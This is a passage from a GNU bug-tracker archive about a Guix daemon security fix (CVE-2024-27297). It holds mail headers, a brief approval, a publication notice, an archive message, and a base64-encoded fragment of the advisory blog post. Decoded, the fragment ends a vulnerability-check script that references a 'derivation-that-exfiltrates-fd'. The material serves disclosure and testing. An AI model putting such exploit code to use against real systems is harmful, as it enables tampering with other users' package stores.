byBjb3JydXB0IH5hLCBcCnlvdXIgc3lzdGVtIGlzIHNhZmUufiUiCiAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgIytkZXJpdmF0aW9uLXRoYXQtZXhmaWx0cmF0ZXMtZmQpCiAgICAg ICAgICAgICAgICAgICAgICAgICAgIChiZWdpbgogICAgICAgICAgICAgICAgICAgICAgICAgICAg IChmb3JtYXQgI3QgIldlIG1hbmFnZWQgdG8gY29ycnVwdCB+YSwgXAptZWFuaW5nIHRoYXQgWU9V UiBTWVNURU0gSVMgVlVMTkVSQUJMRSF+JSIKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICMrZGVyaXZhdGlvbi10aGF0LWV4ZmlsdHJhdGVzLWZkKQogICAgICAgICAgICAgICAg ICAgICAgICAgICAgIChleGl0IDEpKSkpKSkpCgpjaGVjawpgYGAKCiMjIyBBYm91dCBHTlUgR3Vp eAoKW0dOVSBHdWl4XShodHRwczovL2d1aXguZ251Lm9yZykgaXMgYSB0cmFuc2FjdGlvbmFsIHBh Y2thZ2UgbWFuYWdlcgphbmQgYW4gYWR2YW5jZWQgZGlzdHJpYnV0aW9uIG9mIHRoZSBHTlUgc3lz dGVtIHRoYXQgW3Jlc3BlY3RzIHVzZXIKZnJlZWRvbV0oaHR0cHM6Ly93d3cuZ251Lm9yZy9kaXN0 cm9zL2ZyZWUtc3lzdGVtLWRpc3RyaWJ1dGlvbi1ndWlkZWxpbmVzLmh0bWwpLgpHdWl4IGNhbiBi ZSB1c2VkIG9uIHRvcCBvZiBhbnkgc3lzdGVtIHJ1bm5pbmcgdGhlIEh1cmQgb3IgdGhlIExpbnV4 Cmtlcm5lbCwgb3IgaXQgY2FuIGJlIHVzZWQgYXMgYSBzdGFuZGFsb25lIG9wZXJhdGluZyBzeXN0 ZW0KZGlzdHJpYnV0aW9uIGZvciBpNjg2LCB4ODZfNjQsIEFSTXY3LCBBQXJjaDY0LCBhbmQgUE9X RVI5IG1hY2hpbmVzLgoKSW4gYWRkaXRpb24gdG8gc3RhbmRhcmQgcGFja2FnZSBtYW5hZ2VtZW50 IGZlYXR1cmVzLCBHdWl4IHN1cHBvcnRzCnRyYW5zYWN0aW9uYWwgdXBncmFkZXMgYW5kIHJvbGwt YmFja3MsIHVucHJpdmlsZWdlZCBwYWNrYWdlCm1hbmFnZW1lbnQsIHBlci11c2VyIHByb2ZpbGVz LCBhbmQgZ2FyYmFnZSBjb2xsZWN0aW9uLiBXaGVuIHVzZWQgYXMgYQpzdGFuZGFsb25lIEdOVS9M aW51eCBkaXN0cmlidXRpb24sIEd1aXggb2ZmZXJzIGEgZGVjbGFyYXRpdmUsCnN0YXRlbGVzcyBh cHByb2FjaCB0byBvcGVyYXRpbmcgc3lzdGVtIGNvbmZpZ3VyYXRpb24gbWFuYWdlbWVudC4gR3Vp eAppcyBoaWdobHkgY3VzdG9taXphYmxlIGFuZCBoYWNrYWJsZSB0aHJvdWdoCltHdWlsZV0oaHR0 cHM6Ly93d3cuZ251Lm9yZy9zb2Z0d2FyZS9ndWlsZSkgcHJvZ3JhbW1pbmcgaW50ZXJmYWNlcyBh bmQKZXh0ZW5zaW9ucyB0byB0aGUgW1NjaGVtZV0oaHR0cDovL3NjaGVtZXJzLm9yZykgbGFuZ3Vh Z2UuCg== --b1_xKx1i44DOSvJ7Di9xFsftR2PTnqrPGv5eGX1yxtDQ-- From debbugs-submit-bounces@debbugs.gnu.org Tue Mar 12 11:31:58 2024 Received: (at 69728) by debbugs.gnu.org; 12 Mar 2024 15:31:58 +0000 Received: from localhost ([127.0.0.1]:43419 helo=debbugs.gnu.org) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1rk46f-0006sx-9r for submit@debbugs.gnu.org; Tue, 12 Mar 2024 11:31:58 -0400 Received: from eggs.gnu.org ([209.51.188.92]:46284) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1rk46T-0006sb-KC for 69728@debbugs.gnu.org; Tue, 12 Mar 2024 11:31:55 -0400 Received: from fencepost.gnu.org ([2001:470:142:3::e]) by eggs.gnu.org with esmtps (TLS1.2:ECDHE_RSA_AES_256_GCM_SHA384:256) (Exim 4.90_1) (envelope-from ) id 1rk45n-0000R4-Ql; Tue, 12 Mar 2024 11:31:03 -0400 DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=gnu.org; s=fencepost-gnu-org; h=MIME-Version:Date:References:In-Reply-To:Subject:To: From; bh=m9X6kyVn7vP91AKYXiAZTxaG4CX+BrLje8eBOnbj8RE=; b=J7L0e+DIZl0bVWo3d6P/ T/VJVPIfHr9R1RFQpKZ3Km6zmUdODuUecFyP5Lk5u5Y77D6nY/QzeATTmuV0OkFKvtzqUcVEd54aB dweVskDvaXYstfbVL+CWo/Pdevh/Fa0/HT6CwcaYN9WImgTncALhMDLgH2/SFwn53OAlpYZwMs44n nFkUri/+BWZC38Ljl34RN/08aRg5Bv1kTqpN5RZj0dsLq8iIB7W1T4f56EClsmPeLi1NqdbfiHFoK Zhb67fcolkmlOqwzWpYWVgQnRZOfmE57KqTVvEnNs0AW2QDYQ8KWsbhMLV5FXcdDC1v9UdEOVSa3n y8JTV5QHeUSpxg==; From: =?utf-8?Q?Ludovic_Court=C3=A8s?= To: John Kehayias Subject: Re: bug#69728: [PATCH security] daemon: Protect against FD escape when building fixed-output derivations (CVE-2024-27297). In-Reply-To: <87msr334do.fsf@protonmail.com> (John Kehayias's message of "Tue, 12 Mar 2024 14:35:18 +0000") References: <87frwwo1mo.fsf@gnu.org> <871q8flg17.fsf_-_@gnu.org> <87msr334do.fsf@protonmail.com> Date: Tue, 12 Mar 2024 16:31:00 +0100 Message-ID: <87a5n3jwln.fsf_-_@gnu.org> User-Agent: Gnus/5.13 (Gnus v5.13) MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-Spam-Score: -2.3 (--) X-Debbugs-Envelope-To: 69728 Cc: Picnoir , 69728@debbugs.gnu.org, =?utf-8?Q?Th=C3=A9ophane?= Hufschmitt , guix-security@gnu.org X-BeenThere: debbugs-submit@debbugs.gnu.org X-Mailman-Version: 2.1.18 Precedence: list List-Id: List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , Errors-To: debbugs-submit-bounces@debbugs.gnu.org Sender: "Debbugs-submit" X-Spam-Score: -3.3 (---) Hi John, John Kehayias skribis: > The updated post is attached. I will have some time here and there > over the next few hours to make changes, but will mostly be away from > my Guix machine to handle actually pushing. So, once it looks good, > feel free to do that or I can do it this evening my time (in about 7-8 > hours). LGTM, thank you! Ludo=E2=80=99. From debbugs-submit-bounces@debbugs.gnu.org Wed Mar 13 06:03:49 2024 Received: (at 69728-done) by debbugs.gnu.org; 13 Mar 2024 10:03:49 +0000 Received: from localhost ([127.0.0.1]:44745 helo=debbugs.gnu.org) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1rkLSe-0003HF-G3 for submit@debbugs.gnu.org; Wed, 13 Mar 2024 06:03:48 -0400 Received: from eggs.gnu.org ([209.51.188.92]:51966) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1rkLSY-0003Gy-Lm for 69728-done@debbugs.gnu.org; Wed, 13 Mar 2024 06:03:47 -0400 Received: from fencepost.gnu.org ([2001:470:142:3::e]) by eggs.gnu.org with esmtps (TLS1.2:ECDHE_RSA_AES_256_GCM_SHA384:256) (Exim 4.90_1) (envelope-from ) id 1rkLPm-0005DD-2J; Wed, 13 Mar 2024 06:00:50 -0400 DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=gnu.org; s=fencepost-gnu-org; h=MIME-Version:Date:References:In-Reply-To:Subject:To: From; bh=CMd9QMbQrQsdwGBWfWIN1kjA9bymQL0GrxIg0y+Tu30=; b=A4R/YuhH8AjMkb66ByaK KwaNJ5YnsxGMcvTTGZq7Ptd9e5uqtmdfCj6uaLrOtIu0LnhXHjVKR/z7Zoh0C9A8SIzsm4UiI8xm3 zKR0C6RcebMfCt0A0dmtimMXxpgl6ES3JoHKqzMngaFADabRM3ZbU94leWQEGeMtnwDbenB9LS1mf eiiwX7j0kIHjVK7TR5OlRfM0WsVQZwnvejT2RGTAE3O7BFVQ7+aAg/fUq6+KKbDLt7mlang6nyU+X XQCnfO/GEqgYMVlggrdi6Cd8i/oRJvgZrWtdHxZyWJ+aam9/BM5nZ13d0eFNOSSxD+GUqgiEyZvzw HkYMe+uq5euG1g==; From: =?utf-8?Q?Ludovic_Court=C3=A8s?= To: John Kehayias Subject: Re: bug#69728: [PATCH security] daemon: Protect against FD escape when building fixed-output derivations (CVE-2024-27297). In-Reply-To: <87a5n3jwln.fsf_-_@gnu.org> ("Ludovic =?utf-8?Q?Court=C3=A8s?= =?utf-8?Q?=22's?= message of "Tue, 12 Mar 2024 16:31:00 +0100") References: <87frwwo1mo.fsf@gnu.org> <871q8flg17.fsf_-_@gnu.org> <87msr334do.fsf@protonmail.com> <87a5n3jwln.fsf_-_@gnu.org> Date: Wed, 13 Mar 2024 11:00:42 +0100 Message-ID: <871q8ejvsl.fsf_-_@gnu.org> User-Agent: Gnus/5.13 (Gnus v5.13) MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-Spam-Score: -2.3 (--) X-Debbugs-Envelope-To: 69728-done Cc: Picnoir , guix-security@gnu.org, =?utf-8?Q?Th=C3=A9ophane?= Hufschmitt , 69728-done@debbugs.gnu.org X-BeenThere: debbugs-submit@debbugs.gnu.org X-Mailman-Version: 2.1.18 Precedence: list List-Id: List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , Errors-To: debbugs-submit-bounces@debbugs.gnu.org Sender: "Debbugs-submit" X-Spam-Score: -3.3 (---) For posterity: the blog post was published yesterday at . Ludo=E2=80=99. From unknown Sat Sep 06 05:21:21 2025 Received: (at fakecontrol) by fakecontrolmessage; To: internal_control@debbugs.gnu.org From: Debbugs Internal Request Subject: Internal Control Message-Id: bug archived. Date: Wed, 10 Apr 2024 11:24:06 +0000 User-Agent: Fakemail v42.6.9 # This is a fake control message. # # The action: # bug archived. thanks # This fakemail brought to you by your local debbugs # administrator